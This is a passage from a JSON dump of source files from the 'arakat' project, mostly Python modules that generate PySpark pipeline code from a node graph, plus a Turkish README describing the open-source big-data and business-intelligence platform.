str(elem[\"is_nullable\"]) + \")\", \", \"])\n else:\n code.extend(['StructField(\"' + elem[\"column_name\"] +'\", ' + elem[\"data_type\"] + '(), ' + str(elem[\"is_nullable\"]) + \")\", \", \"])\n\n # Might be an unnecessary check\n if (len(schema_info) > 0):\n code.pop()\n code.append(\"])\")\n return code"
},
{
"alpha_fraction": 0.6367663145065308,
"alphanum_fraction": 0.644518256187439,
"avg_line_length": 38.30434799194336,
"blob_id": "c8d6f38664a8c988b40fdcbb1f15033f6102cead",
"content_id": "f756a3304cf1aef9a5d6ae57bf8a72af95f002b6",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 903,
"license_type": "permissive",
"max_line_length": 220,
"num_lines": 23,
"path": "/arakat-backend/pipeline_generator/family_base/BatchWriteToFile.py",
"repo_name": "temizkanekin/arakat",
"src_encoding": "UTF-8",
"text": "from domain.ErrorTypes import ErrorTypes\nfrom validity import IncomingEdgeValidityChecker\nfrom utils import CodeGenerationUtils\n\nimport os\n\ndef generate_code(args):\n node = args[\"node\"]\n requireds_info = args[\"requireds_info\"]\n edges = args[\"edges\"]\n\n checklist={\"df_count\": {1}, \"model_count\": {0}}\n error, extra=IncomingEdgeValidityChecker.check_validity(node[\"id\"], requireds_info, edges, checklist)\n code=[]\n if(error == ErrorTypes.NO_ERROR):\n if (bool(extra[\"dfs\"])):\n df_name = \"df_\" + extra[\"dfs\"][0]\n else:\n df_name = \"df_\" + extra[\"portions\"][0][0] + \"[\" + str(extra[\"portions\"][0][1]) + \"]\"\n\n code.extend([df_name + \".write.save(\" + CodeGenerationUtils.arrange_parameter_value(node[\"parameters\"][\"file_path\"]) +\", format=\"+ CodeGenerationUtils.arrange_parameter_value(node[\"file_type\"]) +\")\", os.linesep])\n\n return code, error"
},
{
"alpha_fraction": 0.59543377161026,
"alphanum_fraction": 0.59543377161026,
"avg_line_length": 36.7931022644043,
"blob_id": "eeacba25dc876c9ff4d82d496de6b41cf20c94ae",
"content_id": "77977153d29626ade31c6cf64f28f63b1b27c6e9",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1095,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 29,
"path": "/arakat-backend/validity/IncomingEdgeValidityChecker.py",
"repo_name": "temizkanekin/arakat",
"src_encoding": "UTF-8",
"text": "from domain.ErrorTypes import ErrorTypes\n\ndef check_validity(node_id, requireds_info, edges, checklist):\n # Assuming that there is no order among incoming edges.\n # In such a case, keep extra info in edges.\n\n error=ErrorTypes.NO_ERROR\n extra={\"models\":[], \"dfs\":[], \"portions\":[]}\n\n if(node_id in requireds_info):\n for req in requireds_info[node_id]:\n edge = edges[req + \"-\" + node_id]\n if(edge[\"type\"]==\"dataframe\"):\n extra[\"dfs\"].append(req)\n elif(edge[\"type\"]==\"portion\"):\n extra[\"portions\"].append([req, edge[\"portion_id\"]])\n elif(edge[\"type\"]==\"model\"):\n extra[\"models\"].append(req)\n else:\n error=ErrorTypes.UNDEFINED_EDGE_ERROR\n\n df_count=len(extra[\"dfs\"]) + len(extra[\"portions\"])\n if(df_count not in checklist[\"df_count\"]):\n error = ErrorTypes.INCOMING_DATAFRAME_COUNT_NOT_MATCH_ERROR\n\n if(len(extra[\"models\"]) not in checklist[\"model_count\"]):\n error = ErrorTypes.INCOMING_MODEL_COUNT_NOT_MATCH_ERROR\n\n return error, extra"
},
{
"alpha_fraction": 0.6572989821434021,
"alphanum_fraction": 0.6619828343391418,
"avg_line_length": 35.628570556640625,
"blob_id": "408c03b2431a81a41c77cc9c1e8da74d23ef8121",
"content_id": "8107ce419d0b62926abf632a81d87924eb2ab8f4",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1281,
"license_type": "permissive",
"max_line_length": 188,
"num_lines": 35,
"path": "/arakat-backend/pipeline_generator/family_base/Join.py",
"repo_name": "temizkanekin/arakat",
"src_encoding": "UTF-8",
"text": "from domain.ErrorTypes import ErrorTypes\nfrom utils import CodeGenerationUtils\nfrom validity import IncomingEdgeValidityChecker\n\nimport os\n\n# Add other join options as well\n# Allow user to specify which dataframe is on left or right\n# How about join cascades\n# Add necessary checks for stream-stream, stream-batch joins...\ndef generate_code(args):\n node = args[\"node\"]\n requireds_info = args[\"requireds_info\"]\n edges = args[\"edges\"]\n\n checklist={\"df_count\": {2}, \"model_count\": {0}}\n error, extra=IncomingEdgeValidityChecker.check_validity(node[\"id\"], requireds_info, edges, checklist)\n code=[]\n if(error == ErrorTypes.NO_ERROR):\n df_names=__get_dfs_to_join(extra)\n code.extend([\"df_\"+node[\"id\"] + \"=\"+df_names[0] + \".join(\" + df_names[1] + \", \" + CodeGenerationUtils.arrange_parameter_value(node[\"parameters\"][\"join_column\"]) + \")\", os.linesep])\n\n return code, error\n\ndef __get_dfs_to_join(extra):\n # In the future, this should handle, left-right dfs and cascades...\n # Also, for stream-static joins, stream df must be on left.\n df_names=[]\n for elem in extra[\"dfs\"]:\n df_names.append(\"df_\" + elem)\n\n for elem in extra[\"portions\"]:\n df_names.append(\"df_\" + elem[0] + \"[\" + str(elem[1]) + \"]\")\n\n return df_names"
},
{
"alpha_fraction": 0.5970149040222168,
"alphanum_fraction": 0.6567164063453674,
"avg_line_length": 20.363636016845703,
"blob_id": "1dae5c446f9a851245a6c47ab164bbb1b6caf02c",
"content_id": "451221aeeb12480b8bde929a99127be8638b6bd4",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 469,
"license_type": "permissive",
"max_line_length": 28,
"num_lines": 22,
"path": "/arakat-backend/domain/NodeFamilyTypes.py",
"repo_name": "temizkanekin/arakat",
"src_encoding": "UTF-8",
"text": "from enum import Enum\n\nclass NodeFamilyTypes(Enum):\n BatchReadFromFile = 0\n BatchReadFromKafka = 1\n BatchWriteToFile = 2\n BatchWriteToKafka = 3\n CrossValidator = 4\n DDFO = 5\n Estimator = 6\n Evaluator = 7\n Join = 8\n ModelApply = 9\n ModelLoad = 10\n ModelSave = 11\n Pipeline = 12\n RandomSplit = 13\n StreamReadFromFile = 14\n StreamReadFromKafka = 15\n StreamWriteToFile = 16\n StreamWriteToKafka = 17\n Transformer = 18"
},
{
"alpha_fraction": 0.6279069781303406,
"alphanum_fraction": 0.6319767236709595,
"avg_line_length": 48.17142868041992,
"blob_id": "8033f2333f7d96b944cbbfc3e3177e4f23f33498",
"content_id": "e12452b2529ca17c59691e74b62fb9af6651c7df",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1720,
"license_type": "permissive",
"max_line_length": 213,
"num_lines": 35,
"path": "/arakat-backend/pipeline_generator/family_base/StreamWriteToKafka.py",
"repo_name": "temizkanekin/arakat",
"src_encoding": "UTF-8",
"text": "from domain.ErrorTypes import ErrorTypes\nfrom validity import IncomingEdgeValidityChecker\nfrom utils import CodeGenerationUtils\n\nimport os\n\ndef generate_code(args):\n node = args[\"node\"]\n requireds_info = args[\"requireds_info\"]\n edges = args[\"edges\"]\n\n checklist={\"df_count\": {1}, \"model_count\": {0}}\n error, extra=IncomingEdgeValidityChecker.check_validity(node[\"id\"], requireds_info, edges, checklist)\n code=[]\n if(error == ErrorTypes.NO_ERROR):\n if (bool(extra[\"dfs\"])):\n df_name = \"df_\" + extra[\"dfs\"][0]\n else:\n df_name = \"df_\" + extra[\"portions\"][0][0] + \"[\" + str(extra[\"portions\"][0][1]) + \"]\"\n\n code.append(df_name + '.selectExpr(\"CAST(' + node[\"parameters\"][\"unique_column_name\"] + ' AS STRING) AS key\", \"to_json(struct(*)) AS value\").writeStream.format(\"kafka\").option(\"kafka.bootstrap.servers\", ')\n code.append(CodeGenerationUtils.arrange_parameter_value(node[\"parameters\"][\"host\"] + \":\" + node[\"parameters\"][\"port\"]) + \")\")\n code.append(\".trigger(\" + __generate_trigger_code(node) + \")\")\n code.append('.option(\"topic\", ' + CodeGenerationUtils.arrange_parameter_value(node[\"parameters\"][\"topic\"]) + \")\")\n code.append('.option(\"checkpointLocation\", ' + CodeGenerationUtils.arrange_parameter_value(node[\"parameters\"][\"checkpoint_path\"]) + \").start()\")\n code.extend([os.linesep, \"query_\" + node[\"id\"], \".awaitTermination()\", os.linesep])\n\n return code, error\n\ndef __generate_trigger_code(node):\n trigger_type=node[\"parameters\"][\"trigger_type\"]\n if(trigger_type == \"once\"):\n return \"once=True\"\n else:\n return trigger_type + \"=\" + \"'\" + str(node[\"parameters\"][\"trigger_value\"])+\" seconds'\""
},
{
"alpha_fraction": 0.824999988079071,
"alphanum_fraction": 0.824999988079071,
"avg_line_length": 40,
"blob_id": "c780bcdd04824d4f6826f22e449c26c2941fff0a",
"content_id": "c11e8a4bfb912418fc85f3fa3ee5d7e2bb4ca01b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": true,
"language": "TypeScript",
"length_bytes": 40,
"license_type": "permissive",
"max_line_length": 40,
"num_lines": 1,
"path": "/arakat-frontend/types/cytoscape-edgehandles/index.d.ts",
"repo_name": "temizkanekin/arakat",
"src_encoding": "UTF-8",
"text": "declare module \"cytoscape-edgehandles\";"
},
{
"alpha_fraction": 0.8402777910232544,
"alphanum_fraction": 0.8406084775924683,
"avg_line_length": 156.94737243652344,
"blob_id": "cd1012b225366d6f67b2be2bfbbd2266339afcdf",
"content_id": "08a74059aac3fb20d2373c5e2bde503715fcc1bc",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3278,
"license_type": "permissive",
"max_line_length": 523,
"num_lines": 19,
"path": "/docs/README.md",
"repo_name": "temizkanekin/arakat",
"src_encoding": "UTF-8",
"text": "# ARAKAT\r\n\r\n## Hakkında\r\nİş zekası uygulamaları temelinde eldeki verinin anlamlandırılarak bilgiye dönüştürülmesi faaliyetlerini içerir. Bu bağlamda iş zekası uygulamalarının temel bileşenleri veri işleme, veri analizi ve bilgi raporlama olarak belirlenebilir. ARAKAT'ın amacı, bu ana bileşenlerin her biri için temel teşkil edebilecek açık kaynak kodlu ve platform bağımsız alt yapılar geliştirilmesidir. Karar verme, öngörü analizi, gerçek zamanlı veri işleme, \"mobile first\" veri görselleştirme gibi konular projenin çekirdeğinde yer almaktadır.\r\n\r\nARAKAT kapsamında iş zekası ve büyük veri analizi uygulamalarına temel teşkil edebilecek açık kaynak kodlu bir platform geliştirilmesi hedeflenmiştir. Bu platform kullanılarak hem yapısal olmayan (ve büyük) verilerin üzerinde veri analiz işlemleri hem de yapısal verilerin üzerinde iş zekası uygulamaları geliştirilebilmesi ARAKAT'ın ana hedefidir. \r\n\r\nARAKAT temelde üç ana modülden oluşmaktadır. Birinci modül farklı veri kaynaklarından farklı hızlarda alınan verilerin işlenebilir hale getirilmesi (temizleme, maskeleme, vb...) işlerinin kapsandığı \"Veri İçerme\" modülüdür. İkinci modül, içerilen verilerin üzerinde istatistiksel modellerin ve veri yapılarının kurulabildiği \"Veri Analiz\" modülüdür. Üçüncü ve son modül ise yapılan analiz sonuçlarının kullanıcı dostu sunumlar halinde görüntülenmesini sağlayan \"Veri Görselleştirme\" modülüdür.\r\n\r\n## Anahtar Kelimeler\r\nBüyük Veri, Veri Analizi, İş Zekası, Açık Kaynak, Makine Öğrenmesi, Dağıtık Sistemler\r\n\r\n## Proje Kurgusu ve Detaylar\r\nTeknik özellikler ve proje kurgusu ile ilgileri aşağıdaki gibi özetlenebilir:\r\n- Açık Kaynak Kodlu ve GPLv3 Lisanslı Geliştirme: Proje kurgusu tamamı ile açık kaynak üzerine kurgulanmıştır. Buradaki temel amaç geliştirimi devam eden ve/veya yeni geliştirilecek uygulamaların jenerik kısımları için açık kaynak camiasının desteğini almak ve bu desteği alırken de projelere özgü içeriği ayırarak farklı paydaşların bu ortak alt yapıları kullanabilmesine\r\nolanak tanımaktır.\r\n- Linux tabanlı ve platform bağımsız dağıtım: Projenin geliştirme ve derleme ortamları tamamen Linux tabanlı (Debian türevleri) sistemler olacaktır. Bununla birlikte proje çıktısı çerçevelerin sınandığı referans uygulama bileşenleri de Docker container'ları halinde yayınlanacaktır. Bu sayede ölçeklenebilir (buluta hazır) ve platform bağımsız yapıların geliştirildiği garanti altına alınmış olacaktır.\r\n- Eğitsel içerik ve API dokümantasyonu: Geliştirilecek alt yapılara ilişkin API (Uygulama Programlama Arayüzü) dokümantasyonları Türkçe olarak sürekli entegrasyon sunucusundaki son adım olarak devamlı üretilecek ve dokümantasyonun güncel ve yeterli olduğu kullanıcı geri dönüşleri ile izlenecektir. Söz konusu içerikte Türkiye içinde bir ilk olacak bu materyal hem bu alana yeni giren bireyler/kurumlar için hem de bu alanda öğretim veren kurumlar için faydalanılabilir olacaktır.\r\n- Geliştiricilere açık ortak bir platform: Bu sayede hem yeni bir ekosistem kurularak ulusal fayda sağlanması hedeflenmektedir.\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5833333134651184,
"alphanum_fraction": 0.5896739363670349,
"avg_line_length": 37.10344696044922,
"blob_id": "1ed95b6f8f419537a99e98cbe5b22c43f91d16ba",
"content_id": "7b231f73e9528aa10bed4c2db1e5ad81ade1165e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1104,
"license_type": "permissive",
"max_line_length": 122,
"num_lines": 29,
"path": "/arakat-backend/pipeline_generator/family_base/Transformer.py",
"repo_name": "temizkanekin/arakat",
"src_encoding": "UTF-8",
"text": "from domain.ErrorTypes import ErrorTypes\nfrom utils import CodeGenerationUtils\nfrom validity import IncomingEdgeValidityChecker\n\nimport os\n\ndef generate_code(args):\n node = args[\"node\"]\n requireds_info = args[\"requireds_info\"]\n edges = args[\"edges\"]\n\n checklist={\"df_count\": {1}, \"model_count\": {0}}\n error, extra=IncomingEdgeValidityChecker.check_validity(node[\"id\"], requireds_info, edges, checklist)\n code=[]\n if(error == ErrorTypes.NO_ERROR):\n if(bool(extra[\"dfs\"])):\n df_name=\"df_\"+extra[\"dfs\"][0]\n else:\n df_name = \"df_\" + extra[\"portions\"][0][0] + \"[\" + str(extra[\"portions\"][0][1]) + \"]\"\n\n code = ['transformer_' + node[\"id\"] + ' = ' + node[\"transformer_name\"] + '(']\n for param in node[\"parameters\"]:\n code.extend([param + \"=\" + CodeGenerationUtils.arrange_parameter_value(node[\"parameters\"][param]), \", \"])\n code.pop()\n code.extend([\")\", os.linesep])\n\n code.extend(['df_' + node[\"id\"] + \"=\" + 'transformer_' + node[\"id\"] + '.transform(' + df_name + ')', os.linesep])\n\n return code, error"
},
{
"alpha_fraction": 0.6716417670249939,
"alphanum_fraction": 0.6735074520111084,
"avg_line_length": 43.70833206176758,
"blob_id": "bec85cd533269b1a6b343a061b6a174cbfe64ec2",
"content_id": "4d9376a01fc9dc8b481417e440fd3a023416b479",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1072,
"license_type": "permissive",
"max_line_length": 217,
"num_lines": 24,
"path": "/arakat-backend/pipeline_generator/family_base/StreamReadFromFile.py",
"repo_name": "temizkanekin/arakat",
"src_encoding": "UTF-8",
"text": "from domain.ErrorTypes import ErrorTypes\nfrom validity import IncomingEdgeValidityChecker, DataSourceValidityChecker\nfrom utils import CodeGenerationUtils\n\nimport os\n\ndef generate_code(args):\n node = args[\"node\"]\n requireds_info = args[\"requireds_info\"]\n edges = args[\"edges\"]\n\n checklist={\"df_count\": {0}, \"model_count\": {0}}\n error, extra=IncomingEdgeValidityChecker.check_validity(node[\"id\"], requireds_info, edges, checklist)\n code=[]\n if(error == ErrorTypes.NO_ERROR):\n error, is_schema_appropriate=DataSourceValidityChecker.check_validity(node)\n if(error == ErrorTypes.NO_ERROR):\n # Must be a valid schema at this point.\n code.append(\"schema_\" + node[\"id\"] + \"=\")\n code.extend([CodeGenerationUtils.arrange_schema(node[\"parameter\"][\"schema\"]), os.linesep])\n\n code.extend([\"df_\" + node[\"id\"] + ' = spark.readStream.schema(schema_'+node[\"id\"]+\").\"+node[\"file_type\"]+\"(\" + CodeGenerationUtils.arrange_parameter_value(node[\"parameters\"][\"file_path\"])+\")\", os.linesep])\n\n return code, error"
},
{
"alpha_fraction": 0.625986635684967,
"alphanum_fraction": 0.6305403709411621,
"avg_line_length": 48.17910385131836,
"blob_id": "4b0aced6e6d0a279fb61d8402de94f4e2c52401b",
"content_id": "39f0d808ffaa0a25795088f05962a6c6736926c5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3294,
"license_type": "permissive",
"max_line_length": 219,
"num_lines": 67,
"path": "/arakat-backend/pipeline_generator/family_base/CrossValidator.py",
"repo_name": "temizkanekin/arakat",
"src_encoding": "UTF-8",
"text": "from domain.ErrorTypes import ErrorTypes\nfrom utils import CodeGenerationUtils\nfrom validity import IncomingEdgeValidityChecker\nfrom validity import CVValiditiyChecker\n\nimport os\n\ndef generate_code(args):\n node = args[\"node\"]\n requireds_info = args[\"requireds_info\"]\n edges = args[\"edges\"]\n\n checklist={\"df_count\": {1}, \"model_count\": {0}}\n error, extra=IncomingEdgeValidityChecker.check_validity(node[\"id\"], requireds_info, edges, checklist)\n code=[]\n if(error == ErrorTypes.NO_ERROR):\n error, extra2=CVValiditiyChecker.check_validity(node[\"nodes\"], node[\"edges\"])\n\n if(bool(extra[\"dfs\"])):\n df_name=\"df_\"+extra[\"dfs\"][0]\n else:\n df_name = \"df_\" + extra[\"portions\"][0][0] + \"[\" + str(extra[\"portions\"][0][1]) + \"]\"\n\n code.extend(__generate_code_for_estimator_instantination(node[\"nodes\"][extra2[\"estimator_node_id\"]]))\n code.extend(__generate_code_for_evaluator_instantination(node[\"nodes\"][extra2[\"evaluator_node_id\"]]))\n code.extend(__generate_code_for_param_grid(node, 'estimator_' + extra2[\"estimator_node_id\"]))\n code.extend(__generate_code_for_cv_instantination(node, extra2[\"estimator_node_id\"], extra2[\"evaluator_node_id\"]))\n\n code.extend(['model_' + node[\"id\"] + \"=\" + 'cv_' + node[\"id\"] + \".fit(\" + df_name + \")\", os.linesep])\n # Following might not be logical unless you aim to predict on training data for some specific needs.\n code.extend(['df_' + node[\"id\"] + \"=\" + 'model_' + node[\"id\"] + '.transform(' + df_name + ')', os.linesep])\n\n return code, error\n\ndef __generate_code_for_cv_instantination(cv_node, estimator_node_id, evaluator_node_id):\n return ['cv_'+cv_node[\"id\"] + \"=CrossValidator(estimator=\", 'estimator_' + estimator_node_id + \", estimatorParamMaps=param_grid_\" + cv_node[\"id\"] + \", evaluator=\" + 'evaluator_' + evaluator_node_id +\")\", os.linesep]\n\ndef __generate_code_for_estimator_instantination(node):\n code = ['estimator_' + node[\"id\"] + ' = ' + node[\"estimator_name\"] + '(']\n for param in node[\"parameters\"]:\n code.extend([param + \"=\" + CodeGenerationUtils.arrange_parameter_value(node[\"parameters\"][param]), \", \"])\n if (len(node[\"parameters\"]) > 0):\n code.pop()\n code.extend([\")\", os.linesep])\n return code\n\ndef __generate_code_for_param_grid(node, cur_estimator_name):\n code=[\"param_grid_\" + node[\"id\"] + \"=None\"]\n # Assuming that fix parameters are given in the estimator itself.\n # Maybe reconsider this part.\n grid_params = node[\"parameters\"][\"parameter_grid\"]\n if(bool(grid_params)):\n code = [\"param_grid_\" + node[\"id\"] + \"=ParamGridBuilder()\"]\n for param in grid_params:\n code.extend([\".addGrid(\"+cur_estimator_name + \".\" + param + \", \"+ CodeGenerationUtils.arrange_parameter_value(grid_params[param])+\")\"])\n code.extend([\".build()\", os.linesep])\n\n return code\n\ndef __generate_code_for_evaluator_instantination(node):\n code = ['evaluator_' + node[\"id\"] + ' = ' + node[\"evaluator_name\"] + '(']\n for param in node[\"parameters\"]:\n code.extend([param + \"=\" + CodeGenerationUtils.arrange_parameter_value(node[\"parameters\"][param]), \", \"])\n if (len(node[\"parameters\"]) > 0):\n code.pop()\n code.extend([\")\", os.linesep])\n return code"
},
{
"alpha_fraction": 0.700560450553894,
"alphanum_fraction": 0.700560450553894,
"avg_line_length": 39.290321350097656,
"blob_id": "196ad881a25f69c43e192d11e0476e7c6ee0d328",
"content_id": "8599bfc3df9e3ac093355df3b919b19581e93cd8",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2498,
"license_type": "permissive",
"max_line_length": 266,
"num_lines": 62,
"path": "/arakat-backend/pipeline_generator/TaskGenerator.py",
"repo_name": "temizkanekin/arakat",
"src_encoding": "UTF-8",
"text": "from domain.ErrorTypes import ErrorTypes\nimport TaskPreprocessor\nfrom domain import ImportInfo, DomainUtils\nfrom utils import GeneralUtils\n\nimport copy\nimport os\n\n# No need to keep data/state, so I did not make it a class..\n# This will be safe for multi-thread use as well~\n\ndef generate_code(graph):\n # Get task_args from task node itself\n dependents_info, requireds_info, waiting_queue = TaskPreprocessor.preprocess_graph(graph)\n requireds_info_clone=copy.deepcopy(requireds_info)\n generation_order, error_code = TaskPreprocessor.determine_generation_order(dependents_info, requireds_info_clone, waiting_queue)\n\n task_code = []\n errors=[]\n if(error_code == ErrorTypes.NO_ERROR):\n task_code.extend(__generate_initialization_codes(graph))\n task_code.append(os.linesep)\n code, errors = __generate_remaining_codes(generation_order, requireds_info, graph)\n task_code.extend(code)\n\n return task_code, errors\n\ndef __generate_initialization_codes(graph):\n # graph is the task node itself\n\n initialization_code=[\"from pyspark import SparkContext\", os.linesep, \"from pyspark.sql import SparkSession\", os.linesep]\n # Maybe improve the following in the future...\n initialization_code.extend([\"from pyspark.sql.types import *\", os.linesep])\n\n import_set=set()\n for node_id in graph[\"nodes\"]:\n import_statements_for_node=ImportInfo.get_import_statements(graph[\"nodes\"][node_id])\n for elem in import_statements_for_node:\n import_set.add(elem)\n\n for statement in import_set:\n initialization_code.extend([statement, os.linesep])\n\n initialization_code.append(os.linesep)\n\n initialization_code.extend(['sc = SparkContext(appName=\"'+graph[\"app_id\"] + '_Task_' + graph[\"id\"] + '\")', os.linesep])\n initialization_code.extend(['spark = SparkSession(sc)', os.linesep, os.linesep])\n\n return initialization_code\n\ndef __generate_remaining_codes(generation_order, requireds_info, graph):\n code=[]\n errors=[]\n for elem in generation_order:\n cur_code, error=GeneralUtils.call_function_by_name(\"pipeline_generator.family_base.\"+DomainUtils.get_node_family_name(graph[\"nodes\"][elem][\"family\"]), \"generate_code\", {\"node\": graph[\"nodes\"][elem], \"requireds_info\": requireds_info, \"edges\": graph[\"edges\"]})\n if(error == ErrorTypes.NO_ERROR):\n code.extend(cur_code)\n else:\n errors.append(error)\n\n # Do not break to capture all errors...\n return code, errors\n"
},
{
"alpha_fraction": 0.6365583539009094,
"alphanum_fraction": 0.6401285529136658,
"avg_line_length": 46.08403396606445,
"blob_id": "f57998bda3fb3214bb41000c1f6079cc56471385",
"content_id": "f1e13feb4eabd2923ae7d933691dfcd5febfdb25",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5602,
"license_type": "permissive",
"max_line_length": 179,
"num_lines": 119,
"path": "/arakat-backend/pipeline_generator/GraphPreprocessor.py",
"repo_name": "temizkanekin/arakat",
"src_encoding": "UTF-8",
"text": "from domain.HighLevelNodeTypes import HighLevelNodeTypes\nfrom domain.ErrorTypes import ErrorTypes\nfrom domain import DomainUtils\n# Assume that there are 2 levels of compound nodes:\n# 1) Tasks\n# 2) Pipeline nodes/CV nodes under task nodes (No more depth)\n# Hence, CV nodes can't have pipelines, but estimators only. CV node can have an estimator and evaluator node, connected with an edge!\n# When estimator is in CV node, it will also keep grid parameters/info which are obtained from user.\n# A task node can't include another task node.\n# An edge can only connect siblings (with the same parent)\n\n# No need to keep data/state, so I did not make it a class..\n# This will be safe for multi-thread use as well~\n\n# Re-write a clear version...\n\ndef preprocess_graph(graph):\n task_nodes={}\n task_edges={}\n\n for edge_id in graph[\"edges\"]:\n cur_node_ids=edge_id.split(\"-\")\n cur_nodes=[]\n for node_id in cur_node_ids:\n cur_nodes.append(graph[\"nodes\"][node_id])\n\n parent_info=__check_parents(cur_nodes, graph[\"nodes\"])\n if(parent_info[\"error\"] != ErrorTypes.NO_ERROR):\n return task_nodes, task_edges, parent_info[\"error\"]\n\n if(parent_info[\"parent_type\"] == HighLevelNodeTypes.NO_NODE):\n task_edges[edge_id]=graph[\"edges\"][edge_id]\n __add_task_nodes(cur_nodes, task_nodes)\n elif(DomainUtils.is_compound(parent_info[\"parent_type\"].value)):\n __add_nodes_of_compounds(edge_id, graph[\"edges\"][edge_id], cur_nodes, parent_info, task_nodes, graph[\"nodes\"])\n elif(parent_info[\"parent_type\"] == HighLevelNodeTypes.TASK_NODE):\n __add_inner_nodes(edge_id, graph[\"edges\"][edge_id], cur_nodes, parent_info, task_nodes, graph[\"nodes\"])\n\n return task_nodes, task_edges, ErrorTypes.NO_ERROR\n\ndef __add_inner_nodes(edge_id, edge_info, cur_nodes, parent_info, task_nodes, graph_nodes):\n task_id = parent_info[\"parent_id\"]\n if (task_id not in task_nodes):\n task_nodes[task_id] = graph_nodes[task_id]\n task_nodes[task_id].update({\"nodes\": {}, \"edges\": {}})\n\n task_nodes[task_id][\"edges\"][edge_id]=edge_info\n\n for node in cur_nodes:\n if(DomainUtils.is_compound(node[\"node_type\"])):\n add_compund_nodes(cur_nodes, task_id, task_nodes)\n else:\n task_nodes[task_id][\"nodes\"][node[\"id\"]] = node\n\ndef add_compund_nodes(cur_nodes, task_id, task_nodes):\n for node in cur_nodes:\n if(node[\"id\"] not in task_nodes[task_id][\"nodes\"]):\n task_nodes[task_id][\"nodes\"][node[\"id\"]]=node\n task_nodes[task_id][\"nodes\"][node[\"id\"]][\"nodes\"] = {}\n task_nodes[task_id][\"nodes\"][node[\"id\"]][\"edges\"] = {}\n\ndef __add_task_nodes(cur_nodes, task_nodes):\n for node in cur_nodes:\n if(node[\"id\"] not in task_nodes):\n task_nodes[node[\"id\"]]=node\n task_nodes[node[\"id\"]][\"nodes\"] = {}\n task_nodes[node[\"id\"]][\"edges\"] = {}\n\ndef __add_nodes_of_compounds(edge_id, edge_info, cur_nodes, parent_info, task_nodes, graph_nodes):\n compound_id=parent_info[\"parent_id\"]\n task_id=parent_info[\"meta_parent_id\"]\n\n if (task_id not in task_nodes):\n task_nodes[task_id] = graph_nodes[task_id]\n task_nodes[task_id].update({\"nodes\": {}, \"edges\": {}})\n\n if (compound_id not in task_nodes[task_id][\"nodes\"]):\n task_nodes[task_id][\"nodes\"][compound_id] = graph_nodes[compound_id]\n task_nodes[task_id][\"nodes\"][compound_id].update({\"nodes\": {}, \"edges\": {}})\n\n task_nodes[task_id][\"nodes\"][compound_id][\"edges\"][edge_id]=edge_info\n\n for node in cur_nodes:\n task_nodes[task_id][\"nodes\"][compound_id][\"nodes\"][node[\"id\"]] = node\n\n\ndef 
__check_parents(cur_nodes, nodes):\n parent1 = cur_nodes[0][\"parent\"]\n parent2 = cur_nodes[1][\"parent\"]\n # No nodes (except Task nodes) can have a None parent.\n if(parent1 is None and parent2 is None):\n # Edge between task\n return {\"parent_type\": HighLevelNodeTypes.NO_NODE, \"error\": ErrorTypes.NO_ERROR}\n elif(parent1 is None and parent2 is not None):\n # Error: since task node cannot be connected with inner nodes (non-task nodes)\n # Error: tasks can't include other tasks as inner nodes\n if(nodes[parent2][\"node_type\"] == HighLevelNodeTypes.TASK_NODE.value):\n return {\"error\": ErrorTypes.TASK_INSIDE_TASK_ERROR}\n return {\"error\": ErrorTypes.TASK_TO_INNER_EDGE_ERROR}\n elif(parent1 is not None and parent2 is None):\n # Error: since task node cannot be connected with inner nodes (non-task nodes)\n # Error: tasks can't include other tasks as inner nodes\n if (nodes[parent1][\"node_type\"] == HighLevelNodeTypes.TASK_NODE.value):\n return {\"error\": ErrorTypes.TASK_INSIDE_TASK_ERROR}\n return {\"error\": ErrorTypes.TASK_TO_INNER_EDGE_ERROR}\n else:\n # Both node have parents.\n\n # Nodes with an edge must have same parents (No Cross Edges).\n # -> No edges between inner nodes of different tasks\n # -> No edges between inner nodes and nodes under pipeline nodes/cv nodes\n # Determine the parent type: Task Node, Pipeline Node or CV Node...\n\n if(parent1 == parent2):\n # Siblings of same parents, satisfies conditions above...\n # Meta-parent will be used when the parent is pipeline node or cv node.\n return {\"parent_id\": parent1, \"parent_type\": HighLevelNodeTypes(nodes[parent1][\"node_type\"]), \"meta_parent_id\": nodes[parent1][\"parent\"], \"error\": ErrorTypes.NO_ERROR}\n else:\n return {\"error\": ErrorTypes.NOT_SIBLING_ERROR}"
},
{
"alpha_fraction": 0.6091290712356567,
"alphanum_fraction": 0.6101784110069275,
"avg_line_length": 53.485713958740234,
"blob_id": "cfb275100671fc66a3fbb217a91004eaf4e1f845",
"content_id": "e5884fb94ad9b883da306de7714323fde375fd46",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1906,
"license_type": "permissive",
"max_line_length": 218,
"num_lines": 35,
"path": "/arakat-backend/pipeline_generator/family_base/BatchReadFromFile.py",
"repo_name": "temizkanekin/arakat",
"src_encoding": "UTF-8",
